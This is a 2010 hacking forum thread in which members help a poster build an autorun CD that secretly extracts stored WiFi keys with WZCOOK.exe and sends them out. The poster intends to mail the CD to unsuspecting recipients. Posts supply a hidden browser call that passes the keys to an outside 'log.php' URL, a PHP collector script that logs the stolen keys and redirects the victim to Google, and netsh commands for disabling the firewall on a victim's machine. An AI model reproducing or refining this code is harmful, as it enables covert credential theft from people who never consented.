RiverJumper Posted October 18, 2010 Share Posted October 18, 2010 Sup everybody. First, sorry if i mess up something but this is my first post overhere. What i was trying to make was an autoruning CD that recovers all the WiFi keys and then uploads then on the internet. I founded a program called WZCOOK.exe by the aircrack-ng suite, that estracts all the keys and store them in a wepkeys.txt file in C:\\ What i manage to do is writing a batch file that just autorun the program and then uploads the file trought FTP. I only have to problems remaning to be solved: 1)How to background all the work 2)The windows firewall cought the outbounds connection Thanks for all the suggestions. RiverJumper Quote Link to comment Share on other sites More sharing options...
Trip Posted October 18, 2010 Share Posted October 18, 2010 why not pass the keys in a url ? call a browser page called log.php?key=iowejdwiowdewio store it to a db ... then redirect them to google ? this wouldn't get caught by the firewall but there is a chance they might see it you could try start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'" thats one way if only you could edit the windows firewall rules on the fly that'd be handy Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 20, 2010 Share Posted October 20, 2010 Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier. Quote Link to comment Share on other sites More sharing options...
RiverJumper Posted October 20, 2010 Author Share Posted October 20, 2010 (edited) why not pass the keys in a url ? call a browser page called log.php?key=iowejdwiowdewio store it to a db ... then redirect them to google ? this wouldn't get caught by the firewall but there is a chance they might see it you could try start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'" thats one way if only you could edit the windows firewall rules on the fly that'd be handy I'm sorry but I'm not that familiar with php, so I would be happy if you could explain yourself a little bit better... I don't really ask for spoon feeding its just that I'm new to programming & Co... In the meantime, looking up on google I fouded this: * Disable Windows XP firewall netsh firewall set opmode disable * Enable the Windows XP firewall netsh firewall set opmode enable I will try, to integrate this in a couple hours and I'll let you know if it succeed or not. though this is just for Windows Firewall, while your idea dribbles any kind of wall... so it's still interesting. Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier. I know i was surprised too when i found out there was pretty much nothing on the net about it! Dunno if it's against the forum's rules but maybe if something works out, I'd like to post it overhere, in some kind of thanks for the help. Edited October 20, 2010 by RiverJumper Quote Link to comment Share on other sites More sharing options...
dr0p Posted October 20, 2010 Share Posted October 20, 2010 <?php $key = $_GET['key']; $fh = fopen('keys.txt', 'a'); fwrite($fh, $key . "\n"); fclose($fh); ?> That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python. Quote Link to comment Share on other sites More sharing options...
c0r Posted October 20, 2010 Share Posted October 20, 2010 This helped me disabling the windows firewall. on a victim's windows box Netsh commands Netsh firewall c Quote Link to comment Share on other sites More sharing options...
Trip Posted October 20, 2010 Share Posted October 20, 2010 (edited) yeah ... txt file is much simpler than db here's my little edit ... <html> <head> <?php $key = $_GET['key']; $fh = fopen('keys.txt', 'a'); fwrite($fh, $key . "\n"); fclose($fh); header('Location: http://www.google.com/'); ?> </head> <body></body> </html> and * Disable Windows XP firewall netsh firewall set opmode disable * Enable the Windows XP firewall netsh firewall set opmode enable sweet thanks for the tip Edited October 20, 2010 by Trip Quote Link to comment Share on other sites More sharing options...
RiverJumper Posted October 21, 2010 Author Share Posted October 21, 2010 (edited) <?php $key = $_GET['key']; $fh = fopen('keys.txt', 'a'); fwrite($fh, $key . "\n"); fclose($fh); ?> That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python. Correct me if I'm wrong but this would "dump" the keys in a txt file. I already founded wzcook.exe for doing it, so why should I use this? Anyway thanks for the help but as i said before I'm not that familiar with this... This helped me disabling the windows firewall. on a victim's windows box Netsh commands Netsh firewall c Thanks for the tip.Are they the same commands I posted upper? or like a better version of it working on Vista too? yeah ... txt file is much simpler than db here's my little edit ... <html> <head> <?php $key = $_GET['key']; $fh = fopen('keys.txt', 'a'); fwrite($fh, $key . "\n"); fclose($fh); header('Location: http://www.google.com/'); ?> </head> <body></body> </html> and sweet thanks for the tip What does the string you added means? and you were talking before about a way to pass the keys trough a URL, can you explain this to me a little bit better please? P.S. You're welcome man! as they say Share the Knowledge! Anyway that command works wonderfully. Just run it even from autorun and the windows firewall will never bother you again. Microsoft should be ashamed of themselves for making it soo easy. Edited October 21, 2010 by RiverJumper Quote Link to comment Share on other sites More sharing options...
RiverJumper Posted October 21, 2010 Author Share Posted October 21, 2010 (edited) Moderators delete this useless post please... I've made an error double posting.... Edited October 21, 2010 by RiverJumper Quote Link to comment Share on other sites More sharing options...
digip Posted October 21, 2010 Share Posted October 21, 2010 Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, its pretty much game over anyway. It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet. If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point. Video Demo - http://vimeo.com/14581715 Quote Link to comment Share on other sites More sharing options...
RiverJumper Posted October 22, 2010 Author Share Posted October 22, 2010 (edited) Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, its pretty much game over anyway. It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet. If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point. Video Demo - http://vimeo.com/14581715 If i had physically access to it, i would use a normal usb with wzcook and the game was easily over. i think wzcook does not need admin powers to act. not sure about it, but mostly many people have their only account already logged in with administration privileges. Anyway thanks for this tip. I'm gonna buy a Teensy USB a day of those, also 'cause you can have some with your ps3 too with it. To be really clear:I'm talking about drop a 0.15 € CD in my "grandma's" mailbox with something like "Best sawing tools" and make the game be. Edited October 22, 2010 by RiverJumper Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 24, 2010 Share Posted October 24, 2010 i think wzcook does not need admin powers to act. not sure about it, but mostly many people have their only account already logged in with administration privileges. Not everyone logs in as an administrator. Especially in a corporate network, everyone has very tight permissions, and access to their machines. So unless you plan on attacking a friend or someone who does have no idea of computer security than, using the method Digip suggested is a must. Just something to keep an eye out for. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.